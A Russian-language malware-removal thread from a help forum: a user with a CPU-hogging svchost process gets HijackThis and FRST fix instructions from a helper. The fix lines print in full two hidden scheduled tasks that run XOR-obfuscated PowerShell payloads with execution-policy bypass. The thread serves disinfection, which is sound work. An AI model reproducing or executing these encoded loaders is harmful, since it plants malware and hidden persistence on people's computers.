Вирус, связанный с svchost.exe

Printable View

15.12.2023, 22:46
lostintired

Вложений: 2

Вирус, связанный с svchost.exe

Доброго дня. На днях поймал вирус, который грузит процессор в 100%, задействуя svchost.exe. Это я "выяснил" в попытках самостоятельно разобраться в проблеме, но как действовать дальше — не знаю. Процесс ведет к тому же файлу, что и оригинальный svchost, при этом у него есть некая связь с проводником (исходя из нажатия кнопки "Browse Parent Process" в программе Task Manager DeLuxe). Пробовал ХитманПро, он ничего не нашел. Прикрепляю два лог-архива, один — с работающим вирусом(процессом), а другой — с вирусом в простое. Также записал небольшое видео с моими рассуждениями и более подробным показом, что происходит: [URL]https://youtu.be/zBflrEnNLlY[/URL]

upd.: оказывается, что этот процесс висит в диспетчере в "Процессы Windows", и есть возможность снять процесс, что позволяет пользоваться ПК с закрытым диспетчером задач. Ещё обнаружил, что этот процесс общается по сети с какой-то айпишкой из Сингапура, её я блокнул в фаерволле.
15.12.2023, 22:47
Info_bot

Уважаемый(ая) [B]lostintired[/B], спасибо за обращение на наш форум!

Помощь при заражении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
16.12.2023, 00:10
Vvvyg

Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите только эти строки[/url]:[code]O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Agent Activation Runtime (empty)
O22 - Tasks: \Microsoft\Windows\Bluetooth\xu33u - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass "#krmpsinebv\x0D\x0A#bpkvtu\x0D\x0A#otsziadxugv\x0D\x0A#wrbtohygl\x0D\x0A#alfsmknqwyxd\x0D\x0Aicm ([scriptblock]::Create([Text.Encoding]::ASCII.GetString((@(571,602,621,621,624,621,606,636,619,630,624,625,591,621,634,633,634,621,634,625,636,634,575,546,575,573,588,630,627,634,625,619,627,614,604,624,625,619,630,625,618,634,573,530,533,588,634,619,562,591,588,589,634,638,635,595,630,625,634,592,623,619,630,624,625,575,562,599,630,620,619,624,621,614,588,638,617,634,588,619,614,627,634,575,588,638,617,634,593,624,619,631,630,625,632,530,533,616,631,630,627,634,575,567,571,619,621,618,634,566,575,612,530,533,575,575,575,575,604,627,634,638,621,562,603,625,620,604,627,630,634,625,619,604,638,636,631,634,548,530,533,575,575,575,575,630,623,636,624,625,633,630,632,575,560,633,627,618,620,631,635,625,620,548,530,533,575,575,575,575,571,638,635,623,575,546,575,600,634,619,562,593,634,619,606,635,638,623,619,634,621,575,611,575,584,631,634,621,634,562,592,637,629,634,636,619,575,612,575,571,576,561,588,619,638,619,618,620,575,562,634,622,575,568,586,623,568,575,610,530,533,575,575,575,575,571,630,625,635,575,546,575,571,638,635,623,561,598,625,619,634,621,633,638,636,634,598,625,635,634,615,530,533,575,575,575,575,571,630,625,619,575,546,575,571,638,635,623,561,598,625,619,634,621,633,638,636,634,606,627,630,638,620,530,533,575,575,575,575,571,635,625,620,575,546,575,607,567,573,551,561,551,561,551,561,551,573,563,575,573,551,561,551,561,555,561,555,573,566,575,530,533,575,575,575,575,588,634,619,562,603,625,620,604,627,630,634,625,619,588,634,621,617,634,621,606,635,635,621,634,620,620,575,562,598,625,619,634,621,633,638,636,634,598,625,635,634,615,575,571,630,625,635,575,562,588,634,621,617,634,621,606,635,635,621,634,620,620,634,620,575,571,635,625,620,548,530,533,575,575,575,575,588,619,638,621,619,562,588,627,634,634,623,575,562,588,634,636,624,625,635,620,575,567,600,634,619,562,589,638,625,635,624,626,575,562,594,630,625,630,626,618,626,575,558,553,575,562,594,638,615,630,626,618,626,575,557,559,566,548,530,533,575,575,575,575,623,630,625,632,575,632,634,619,636,634,621,619,561,625,634,619,530,533,575,575,575,575,623,630,625,632,575,632,634,619,636,634,621,619,561,625,634,619,530,533,575,575,575,575,571,618,621,627,575,546,575,573,631,619,619,623,620,549,560,560,632,634,619,636,634,621,619,561,625,634,619,560,636,632,619,638,627,634,625,619,561,619,615,619,573,530,533,575,575,575,575,571,616,634,637,589,634,622,618,634,620,619,575,546,575,580,588,614,620,619,634,626,561,593,634,619,561,599,619,619,623,584,634,637,589,634,622,618,634,620,619,578,549,549,604,621,634,638,619,634,567,571,618,621,627,566,530,533,575,575,575,575,571,616,634,637,589,634,622,618,634,620,619,561,594,634,619,631,624,635,575,546,575,573,600,602,587,573,530,533,575,575,575,575,571,621,634,620,623,624,625,620,634,575,546,575,571,616,634,637,589,634,622,618,634,620,619,561,600,634,619,589,634,620,623,624,625,620,634,567,566,530,533,575,575,575,575,571,620,619,621,634,638,626,575,546,575,571,621,634,620,623,624,625,620,634,561,600,634,619,589,634,620,623,624,625,620,634,588,619,621,634,638,626,567,566,530,533,575,575,575,575,571,620,636,621,630,623,619,605,627,624,636,628,575,546,575,580,588,614,620,619,634,626,561,594,638,625,638,632,634,626,634,625,619,561,606,618,619,624,626,638,619,630,624,625,561,588,636,621,630,623,619,605,627,624,636,628,578,549,549,604,621,634,638,619,634,567,567,593,634,616,562,592,637,629,634,636,619,575,588,614,620,619,634,626,561,598,592,561,588,619,621,634,638,626,589,634,638,635,634,621,567,571,620,619,621,634,638,626,566,566,561,589,634,638,635,587,624,602,625,635,567,566,566,530,533,575,575,575,575,571,620,619,621,634,638,626,561,603,630,620,623,624,620,634,567,566,530,533,575,575,575,575,569,575,571,620,636,621,630,623,619,605,627,624,636,628,575,611,575,592,618,619,562,593,618,627,627,530,533,575,575,575,575,589,634,626,624,617,634,562,598,619,634,626,575,562,591,638,619,631,575,573,571,634,625,617,549,620,614,620,619,634,626,635,621,630,617,634,579,584,630,625,635,624,616,620,579,591,621,634,633,634,619,636,631,579,565,561,623,633,573,575,562,601,624,621,636,634,530,533,575,575,575,575,589,634,626,624,617,634,562,598,619,634,626,575,562,591,638,619,631,575,573,571,634,625,617,549,606,591,591,603,606,587,606,579,594,630,636,621,624,620,624,633,619,579,584,630,625,635,624,616,620,579,591,624,616,634,621,588,631,634,627,627,579,591,588,589,634,638,635,595,630,625,634,579,565,561,565,573,575,562,601,624,621,636,634,530,533,575,575,575,575,600,634,619,562,584,630,625,602,617,634,625,619,575,562,595,630,620,619,595,624,632,575,565,575,611,575,584,631,634,621,634,562,592,637,629,634,636,619,575,612,575,571,576,561,595,624,632,587,614,623,634,575,562,625,634,575,573,592,623,634,621,638,619,630,624,625,638,627,573,575,610,575,611,575,601,624,621,602,638,636,631,562,592,637,629,634,636,619,575,612,575,604,627,634,638,621,562,602,617,634,625,619,595,624,632,575,562,595,624,632,593,638,626,634,575,571,576,561,595,624,632,593,638,626,634,575,610,530,533,575,575,575,575,604,627,634,638,621,562,599,624,620,619,530,533,575,575,575,575,604,627,634,638,621,562,599,630,620,619,624,621,614,530,533,530,533,575,575,575,575,588,619,638,621,619,562,588,627,634,634,623,575,562,588,634,636,624,625,635,620,575,567,600,634,619,562,589,638,625,635,624,626,575,562,594,630,625,630,626,618,626,575,557,553,559,559,575,562,594,638,615,630,626,618,626,575,556,553,558,559,566,530,533,610,530,533,530,533,530,533) | % { $_ -bxor 543 }))))\x0D\x0Atarfjynzdslm\x0D\x0Axzkjshcfqot\x0D\x0Astauwpc\x0D\x0Amkhbvny\x0D\x0Ahqldrno" (sign: '')
O22 - Tasks: \Microsoft\Windows\WindowsBackup\User - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass "#xkjefrspu\x0D\x0A#zbxpnquaojm\x0D\x0A#ctaemqvu\x0D\x0A#hyxfcrnwijm\x0D\x0A#yhfpw\x0D\x0Aicm ([scriptblock]::Create([Text.Encoding]::ASCII.GetString((@(410,437,444,440,427,500,413,439,426,410,437,432,444,439,429,410,440,442,433,444,482,468,467,432,425,442,438,439,447,432,446,505,502,447,437,428,426,433,445,439,426,482,468,467,394,444,429,500,393,394,395,444,440,445,405,432,439,444,406,425,429,432,438,439,505,500,401,432,426,429,438,427,416,394,440,431,444,394,429,416,437,444,505,394,440,431,444,407,438,429,433,432,439,446,482,468,467,509,440,445,425,505,484,505,414,444,429,500,407,444,429,408,445,440,425,429,444,427,505,421,505,398,433,444,427,444,500,406,443,435,444,442,429,505,418,505,509,390,503,394,429,440,429,428,426,505,500,444,424,505,510,396,425,510,505,420,468,467,509,432,439,445,505,484,505,509,440,445,425,503,400,439,429,444,427,447,440,442,444,400,439,445,444,417,468,467,509,432,439,429,505,484,505,509,440,445,425,503,400,439,429,444,427,447,440,442,444,408,437,432,440,426,468,467,509,445,439,426,505,484,505,409,497,507,481,503,481,503,481,503,481,507,501,505,507,481,503,481,503,493,503,493,507,496,505,468,467,394,444,429,500,413,439,426,410,437,432,444,439,429,394,444,427,431,444,427,408,445,445,427,444,426,426,505,500,400,439,429,444,427,447,440,442,444,400,439,445,444,417,505,509,432,439,445,505,500,394,444,427,431,444,427,408,445,445,427,444,426,426,444,426,505,509,445,439,426,482,468,467,394,429,440,427,429,500,394,437,444,444,425,505,500,394,444,442,438,439,445,426,505,497,414,444,429,500,395,440,439,445,438,436,505,500,404,432,439,432,436,428,436,505,488,495,505,500,404,440,417,432,436,428,436,505,491,489,496,482,468,467,509,444,445,505,484,505,409,497,507,431,440,437,432,445,426,426,437,507,501,505,507,431,440,437,432,445,432,425,507,496,468,467,509,424,445,505,484,505,409,497,507,431,440,437,432,445,432,425,507,501,505,507,431,440,437,432,445,426,426,437,507,501,505,507,429,417,429,434,444,416,507,496,468,467,509,440,443,505,484,505,507,440,443,442,445,444,447,446,433,432,435,434,437,436,439,489,488,491,490,493,492,495,494,481,480,507,468,467,509,445,436,505,484,505,409,497,496,468,467,468,467,447,438,427,444,440,442,433,505,497,509,444,505,432,439,505,509,444,445,496,505,418,468,467,505,505,505,505,509,445,505,484,505,509,444,505,498,505,507,503,439,444,429,507,468,467,505,505,505,505,509,445,436,505,498,484,505,509,445,468,467,420,468,467,468,467,447,438,427,444,440,442,433,505,497,509,424,505,432,439,505,509,424,445,496,505,418,468,467,505,505,505,505,509,445,505,484,505,509,424,505,498,505,507,503,438,439,437,432,439,444,507,468,467,505,505,505,505,509,445,436,505,498,484,505,509,445,468,467,420,468,467,468,467,447,438,427,505,497,509,435,505,484,505,489,482,505,509,435,505,500,437,429,505,492,482,505,509,435,498,498,496,505,418,468,467,505,505,505,505,509,426,444,444,445,505,484,505,414,444,429,500,395,440,439,445,438,436,468,467,505,505,505,505,509,445,505,484,505,507,507,468,467,505,505,505,505,447,438,427,505,497,509,432,505,484,505,489,482,505,509,432,505,500,437,429,505,493,493,482,505,509,432,498,498,496,505,418,468,467,505,505,505,505,505,505,505,505,509,432,439,445,444,417,505,484,505,386,404,440,429,433,388,483,483,415,437,438,438,427,497,497,414,444,429,500,395,440,439,445,438,436,505,500,404,432,439,432,436,428,436,505,489,505,500,404,440,417,432,436,428,436,505,497,509,440,443,503,405,444,439,446,429,433,496,496,496,468,467,505,505,505,505,505,505,505,505,509,445,505,498,484,505,509,440,443,386,509,432,439,445,444,417,388,468,467,505,505,505,505,420,468,467,505,505,505,505,509,445,505,498,484,505,507,503,439,444,429,507,468,467,505,505,505,505,509,445,436,505,498,484,505,509,445,468,467,420,468,467,468,467,509,445,436,505,484,505,509,445,436,505,421,505,414,444,429,500,395,440,439,445,438,436,505,500,410,438,428,439,429,505,509,445,436,503,410,438,428,439,429,468,467,468,467,509,428,426,426,505,484,505,409,497,496,468,467,447,438,427,505,497,509,432,484,489,482,505,509,432,505,500,437,429,505,488,481,492,482,505,509,432,498,498,496,505,418,468,467,509,428,426,505,484,505,507,404,438,419,432,437,437,440,502,492,503,489,505,497,398,432,439,445,438,430,426,505,407,397,505,488,489,503,489,482,505,398,432,439,495,493,482,505,417,495,493,496,505,408,425,425,437,444,398,444,443,402,432,429,502,507,505,498,505,497,414,444,429,500,395,440,439,445,438,436,505,500,404,432,439,432,436,428,436,505,490,489,489,489,505,500,404,440,417,432,436,428,436,505,494,489,489,489,496,503,397,438,394,429,427,432,439,446,497,496,505,498,505,507,503,490,495,505,497,402,401,397,404,405,501,505,437,432,434,444,505,414,444,442,434,438,496,505,410,433,427,438,436,444,502,507,505,498,505,497,414,444,429,500,395,440,439,445,438,436,505,500,404,432,439,432,436,428,436,505,494,489,505,500,404,440,417,432,436,428,436,505,480,489,496,503,397,438,394,429,427,432,439,446,497,496,505,498,505,507,503,489,503,507,505,498,505,497,414,444,429,500,395,440,439,445,438,436,505,500,404,432,439,432,436,428,436,505,490,489,489,489,505,500,404,440,417,432,436,428,436,505,493,489,489,489,496,503,397,438,394,429,427,432,439,446,497,496,505,498,505,507,503,507,505,498,505,497,414,444,429,500,395,440,439,445,438,436,505,500,404,432,439,432,436,428,436,505,488,489,489,505,500,404,440,417,432,436,428,436,505,492,489,489,496,503,397,438,394,429,427,432,439,446,497,496,505,498,505,507,505,394,440,447,440,427,432,502,507,505,498,505,497,414,444,429,500,395,440,439,445,438,436,505,500,404,432,439,432,436,428,436,505,490,489,489,489,505,500,404,440,417,432,436,428,436,505,493,489,489,489,496,503,397,438,394,429,427,432,439,446,497,496,505,498,505,507,503,507,505,498,505,497,414,444,429,500,395,440,439,445,438,436,505,500,404,432,439,432,436,428,436,505,488,489,489,505,500,404,440,417,432,436,428,436,505,492,489,489,496,503,397,438,394,429,427,432,439,446,497,496,468,467,509,428,426,426,505,498,484,505,509,428,426,468,467,420,468,467,468,467,509,427,440,505,484,505,509,428,426,426,505,421,505,414,444,429,500,395,440,439,445,438,436,482,468,467,468,467,509,427,426,505,484,505,509,439,428,437,437,468,467,447,438,427,444,440,442,433,505,497,509,445,505,432,439,505,509,445,436,496,505,418,468,467,505,505,505,505,429,427,416,505,418,468,467,505,505,505,505,505,505,505,505,509,445,439,505,484,505,395,444,426,438,437,431,444,500,413,439,426,407,440,436,444,505,500,407,440,436,444,505,509,445,505,500,397,416,425,444,505,397,385,397,505,500,413,439,426,406,439,437,416,468,467,505,505,505,505,505,505,505,505,432,447,505,497,509,445,439,496,505,418,468,467,505,505,505,505,505,505,505,505,505,505,505,505,509,429,417,429,505,484,505,509,445,439,505,421,505,398,433,444,427,444,500,406,443,435,444,442,429,505,418,509,390,503,397,416,425,444,505,500,444,424,505,507,397,385,397,507,420,468,467,505,505,505,505,505,505,505,505,505,505,505,505,509,429,417,429,426,505,484,505,509,429,417,429,503,394,429,427,432,439,446,426,468,467,505,505,505,505,505,505,505,505,505,505,505,505,509,443,440,505,484,505,509,429,417,429,426,505,500,426,425,437,432,429,505,510,501,510,505,421,505,415,438,427,412,440,442,433,500,406,443,435,444,442,429,505,418,505,386,443,416,429,444,388,509,390,505,420,468,467,505,505,505,505,505,505,505,505,505,505,505,505,509,394,429,427,505,484,505,386,394,416,426,429,444,436,503,397,444,417,429,503,412,439,442,438,445,432,439,446,388,483,483,413,444,447,440,428,437,429,503,414,444,429,394,429,427,432,439,446,497,509,443,440,496,468,467,505,505,505,505,505,505,505,505,505,505,505,505,468,467,505,505,505,505,505,505,505,505,505,505,505,505,432,447,505,497,509,394,429,427,496,505,418,468,467,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,509,428,505,484,505,507,509,394,429,427,507,468,467,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,386,394,416,426,429,444,436,503,407,444,429,503,394,444,427,431,432,442,444,393,438,432,439,429,404,440,439,440,446,444,427,388,483,483,394,444,427,431,444,427,410,444,427,429,432,447,432,442,440,429,444,399,440,437,432,445,440,429,432,438,439,410,440,437,437,443,440,442,434,505,484,505,418,509,429,427,428,444,420,468,467,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,509,427,505,484,505,386,394,416,426,429,444,436,503,407,444,429,503,401,429,429,425,398,444,443,427,444,424,428,444,426,429,388,483,483,410,427,444,440,429,444,497,509,428,496,468,467,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,509,427,503,396,426,444,427,408,446,444,439,429,505,484,505,509,427,440,468,467,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,509,427,503,404,444,429,433,438,445,505,484,505,507,414,412,397,507,468,467,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,509,427,426,505,484,505,509,427,503,414,444,429,395,444,426,425,438,439,426,444,497,496,468,467,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,505,443,427,444,440,434,482,468,467,505,505,505,505,505,505,505,505,505,505,505,505,420,468,467,505,505,505,505,505,505,505,505,420,468,467,505,505,505,505,420,505,442,440,429,442,433,505,418,468,467,468,467,505,505,505,505,505,505,505,505,509,427,440,505,484,505,497,509,428,426,426,505,421,505,398,433,444,427,444,500,406,443,435,444,442,429,505,418,509,390,505,500,439,444,505,509,427,440,420,505,421,505,414,444,429,500,395,440,439,445,438,436,496,482,468,467,505,505,505,505,420,468,467,420,468,467,468,467,432,447,505,497,509,427,426,496,505,418,468,467,505,505,505,505,509,426,429,505,484,505,509,427,426,503,414,444,429,395,444,426,425,438,439,426,444,394,429,427,444,440,436,497,496,468,467,505,505,505,505,509,427,444,440,445,444,427,505,484,505,407,444,430,500,406,443,435,444,442,429,505,394,416,426,429,444,436,503,400,406,503,394,429,427,444,440,436,395,444,440,445,444,427,497,509,426,429,496,468,467,505,505,505,505,509,426,429,417,429,505,484,505,509,427,444,440,445,444,427,503,395,444,440,445,397,438,412,439,445,497,496,468,467,505,505,505,505,509,426,443,505,484,505,386,394,442,427,432,425,429,411,437,438,442,434,388,483,483,410,427,444,440,429,444,497,509,426,429,417,429,496,468,467,505,505,505,505,509,427,444,440,445,444,427,503,413,432,426,425,438,426,444,497,496,482,468,467,505,505,505,505,432,442,436,505,509,426,443,482,468,467,420,468,467,468,467,509,444,431,444,439,429,405,438,446,426,505,484,505,414,444,429,500,398,432,439,412,431,444,439,429,505,500,405,432,426,429,405,438,446,505,499,468,467,447,438,427,444,440,442,433,505,497,509,437,438,446,505,432,439,505,509,444,431,444,439,429,405,438,446,426,496,505,418,468,467,505,505,505,505,432,447,505,497,509,437,438,446,503,405,438,446,397,416,425,444,505,500,439,444,505,507,406,425,444,427,440,429,432,438,439,440,437,507,496,505,418,468,467,505,505,505,505,505,505,505,505,410,437,444,440,427,500,412,431,444,439,429,405,438,446,505,500,405,438,446,407,440,436,444,505,509,437,438,446,503,405,438,446,407,440,436,444,482,468,467,505,505,505,505,420,468,467,420,468,467,468,467,410,437,444,440,427,500,413,439,426,410,437,432,444,439,429,410,440,442,433,444,482,468,467,432,425,442,438,439,447,432,446,505,502,447,437,428,426,433,445,439,426,468,467,410,437,444,440,427,500,401,438,426,429,482,468,467,410,437,444,440,427,500,401,432,426,429,438,427,416,482,468,467,395,444,436,438,431,444,500,400,429,444,436,505,500,393,440,429,433,505,507,509,444,439,431,483,426,416,426,429,444,436,445,427,432,431,444,389,398,432,439,445,438,430,426,389,393,427,444,447,444,429,442,433,389,499,503,425,447,507,505,500,415,438,427,442,444,482,468,467,395,444,436,438,431,444,500,400,429,444,436,505,500,393,440,429,433,505,507,509,444,439,431,483,408,393,393,413,408,397,408,389,404,432,442,427,438,426,438,447,429,389,398,432,439,445,438,430,426,389,393,438,430,444,427,394,433,444,437,437,389,393,394,395,444,440,445,405,432,439,444,389,499,503,499,507,505,500,415,438,427,442,444,482,468,467,506,445,439,426,468,467,468,467) | % { $_ -bxor 473 }))))\x0D\x0Anygbi\x0D\x0Amevcjzdhu\x0D\x0Andlakz\x0D\x0Awnuzi\x0D\x0Amvtsqfldup" (sign: '')[/code]
А также все строки [B]O1 - Hosts:[/B] начиная с [B]0.0.0.0 uplooder.net[/B]

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] или с [URL="https://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/"]зеркала[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите [B]Да[/B] для соглашения с предупреждением.

Нажмите кнопку [B]Сканировать[/B].

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
16.12.2023, 00:50
lostintired

Вложений: 1

Спасибо за столь оперативный ответ, вот архив:

п.с.: после перезагрузки с фиксами в HijackThis, не было необходимости убивать процесс в диспетчере задач, процессор не нагружался
16.12.2023, 10:38
Vvvyg

Выделите и скопируйте в буфер обмена следующий код:[CODE]Start::
CreateRestorePoint:
S4 CA_LIC_CLNT; "C:\Program Files (x86)\CA\SharedComponents\CA_LIC\\lic98rmt.exe" [X]
S2 LogWatch; "C:\Program Files (x86)\CA\SharedComponents\CA_LIC\LogWatNT.exe" [X]
S4 luminati_net_updater_win_brightvpn_com; "D:/programi/Bright VPN/net_updater32.exe" --updater win_brightvpn.com [X]
CustomCLSID: HKU\S-1-5-21-4255237308-602886473-3055442971-1001_Classes\CLSID\{0ee77ff2-227b-14cc-9475-5bffd7e13709}\localserver32 -> "D:\programi\Voicemod Desktop\VoicemodDesktop.exe" -ToastActivated => Нет файла
ContextMenuHandlers2: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => D:\programi\UltraISO\isoshl64.dll -> Нет файла
ContextMenuHandlers4: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => D:\programi\UltraISO\isoshl64.dll -> Нет файла
ContextMenuHandlers6: [UltraISO] -> {AD392E40-428C-459F-961E-9B147782D099} => D:\programi\UltraISO\isoshl64.dll -> Нет файла
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhjkhkjq [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`pgyih [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`pgyjhioihinfh [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`vovtfe.qpsu.obnfjhjkhkjq [0]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [5126]
AlternateDataStreams: C:\Users\xu33u\Application Data:eb92b835a834003ac00ee2632de0e925 [394]
IE trusted site: HKU\S-1-5-21-4255237308-602886473-3055442971-1001\...\hola.org -> hxxp://hola.org
FirewallRules: [UDP Query User{CA868BE6-1DE3-4529-8D9B-16979FCEA1E7}D:\games\pummel party\pummelparty.exe] => (Allow) D:\games\pummel party\pummelparty.exe => Нет файла
FirewallRules: [TCP Query User{08BC414E-9F5B-4329-9610-BDAE6F5E0E53}D:\games\pummel party\pummelparty.exe] => (Allow) D:\games\pummel party\pummelparty.exe => Нет файла
FirewallRules: [UDP Query User{35D947F8-7C45-45B9-9DFE-0DCFCD31CD7C}D:\games\the jackbox party pack 6\the jackbox party pack 6.exe] => (Allow) D:\games\the jackbox party pack 6\the jackbox party pack 6.exe => Нет файла
FirewallRules: [TCP Query User{99320362-88E4-42D4-A198-2ACBD5E06578}D:\games\the jackbox party pack 6\the jackbox party pack 6.exe] => (Allow) D:\games\the jackbox party pack 6\the jackbox party pack 6.exe => Нет файла
FirewallRules: [UDP Query User{E9DDB719-686B-4136-A390-55ADCDF1C5D2}D:\games\the jackbox party pack 7\the jackbox party pack 7.exe] => (Block) D:\games\the jackbox party pack 7\the jackbox party pack 7.exe => Нет файла
FirewallRules: [TCP Query User{F8C787D8-3D75-4F6F-928F-8CDAB2144198}D:\games\the jackbox party pack 7\the jackbox party pack 7.exe] => (Block) D:\games\the jackbox party pack 7\the jackbox party pack 7.exe => Нет файла
FirewallRules: [UDP Query User{2C88C207-BA2B-4EAF-A2C9-C12886E3C437}D:\programi\telegram desktop\telegram.exe] => (Allow) D:\programi\telegram desktop\telegram.exe => Нет файла
FirewallRules: [TCP Query User{56DDBA25-E4B5-4CF6-9C85-050469A4ECFF}D:\programi\telegram desktop\telegram.exe] => (Allow) D:\programi\telegram desktop\telegram.exe => Нет файла
FirewallRules: [UDP Query User{DF5CB1C3-B52B-45BC-AFAE-7122DBF65DCC}D:\games\the jackbox party pack 4\the jackbox party pack 4.exe] => (Allow) D:\games\the jackbox party pack 4\the jackbox party pack 4.exe => Нет файла
FirewallRules: [TCP Query User{F2A1266E-CBA0-446F-B95F-F6CAC2524168}D:\games\the jackbox party pack 4\the jackbox party pack 4.exe] => (Allow) D:\games\the jackbox party pack 4\the jackbox party pack 4.exe => Нет файла
FirewallRules: [{3EBD3809-A9B0-4B04-92B1-EC8A51FDA145}] => (Allow) D:\programi\droidcam\DroidCamApp.exe => Нет файла
FirewallRules: [{C0BFFA62-3075-400D-A1E6-D8E26351B92F}] => (Allow) D:\programi\droidcam\DroidCamApp.exe => Нет файла
FirewallRules: [{38A0A0A6-DCD7-4BFB-92D6-80D9D8449E53}] => (Allow) D:\programi\qBittorrent\qbittorrent.exe => Нет файла
FirewallRules: [{B81378A0-7CE4-4EBD-8707-11F4CBBDF283}] => (Allow) D:\programi\qBittorrent\qbittorrent.exe => Нет файла
FirewallRules: [{907E2C30-10DE-4FE2-B7B7-072DF8119A6B}] => (Allow) D:\Steam Games D\steamapps\common\wallpaper_engine\launcher.exe => Нет файла
FirewallRules: [{93C17014-898A-4ACB-BFD3-5795CDB828CA}] => (Allow) D:\Steam Games D\steamapps\common\wallpaper_engine\launcher.exe => Нет файла
FirewallRules: [TCP Query User{FD2BAC91-766B-4C11-A453-E8B527C90FA5}D:\steam games d\steamapps\common\sandstorm\insurgency\binaries\win64\insurgencyclient-win64-shipping.exe] => (Allow) D:\steam games d\steamapps\common\sandstorm\insurgency\binaries\win64\insurgencyclient-win64-shipping.exe => Нет файла
FirewallRules: [UDP Query User{A37EA1C8-BCB7-442B-8194-48690D995146}D:\steam games d\steamapps\common\sandstorm\insurgency\binaries\win64\insurgencyclient-win64-shipping.exe] => (Allow) D:\steam games d\steamapps\common\sandstorm\insurgency\binaries\win64\insurgencyclient-win64-shipping.exe => Нет файла
FirewallRules: [TCP Query User{AD632AEF-A257-4003-B86D-CB3E4D64F1F2}C:\adobe\adobe after effects 2023\support files\afterfx.exe] => (Allow) C:\adobe\adobe after effects 2023\support files\afterfx.exe => Нет файла
FirewallRules: [UDP Query User{FF6A776C-0EF1-4CCD-8E14-86DD55A30900}C:\adobe\adobe after effects 2023\support files\afterfx.exe] => (Allow) C:\adobe\adobe after effects 2023\support files\afterfx.exe => Нет файла
FirewallRules: [TCP Query User{D93E7B0B-8C6D-4829-A452-1E730EE6ACD0}D:\programi\java\bin\java.exe] => (Allow) D:\programi\java\bin\java.exe => Нет файла
FirewallRules: [UDP Query User{47DB1543-ED63-4C05-965D-A0B4586DB95F}D:\programi\java\bin\java.exe] => (Allow) D:\programi\java\bin\java.exe => Нет файла
FirewallRules: [TCP Query User{18C6E49A-0239-465C-B9B6-7C881304CD9B}D:\programi\substance painter\substance painter.exe] => (Allow) D:\programi\substance painter\substance painter.exe => Нет файла
FirewallRules: [UDP Query User{21A54B41-79DB-4D89-8196-93367D554DB7}D:\programi\substance painter\substance painter.exe] => (Allow) D:\programi\substance painter\substance painter.exe => Нет файла
FirewallRules: [{3E979C85-1DB1-4DA2-8394-EA104076526B}] => (Allow) D:\Steam Games D\steamapps\common\wallpaper_engine\bin\diagnostics32.exe => Нет файла
FirewallRules: [{320348DC-11BD-4AA7-9357-0C8AB9E7BFDD}] => (Allow) D:\Steam Games D\steamapps\common\wallpaper_engine\bin\diagnostics32.exe => Нет файла
FirewallRules: [{4CB04BE6-5080-4175-B077-038485A99761}] => (Allow) D:\Steam Games D\steamapps\common\RutonyChat\RutonyChat.exe => Нет файла
FirewallRules: [{FE4B53FA-57D6-4137-A909-52928B4D9200}] => (Allow) D:\Steam Games D\steamapps\common\RutonyChat\RutonyChat.exe => Нет файла
FirewallRules: [{B32B0C72-8CDA-4555-B522-F41DACE60B81}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Factorio\bin\x64\factorio.exe => Нет файла
FirewallRules: [{03C7F913-5A70-4F77-8332-72CE113B3BFD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Factorio\bin\x64\factorio.exe => Нет файла
FirewallRules: [{E542F17E-B09B-401A-88AB-07AD01B56183}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin64\dontstarve_steam_x64.exe => Нет файла
FirewallRules: [{6DE6B4B3-57C5-4A91-A773-79B6090F9866}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin64\dontstarve_steam_x64.exe => Нет файла
FirewallRules: [{43A0BC3F-877C-4591-ADC5-898CB607F44E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe => Нет файла
FirewallRules: [{6A69839E-1E7D-4C37-A952-240D2B3CEF7F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe => Нет файла
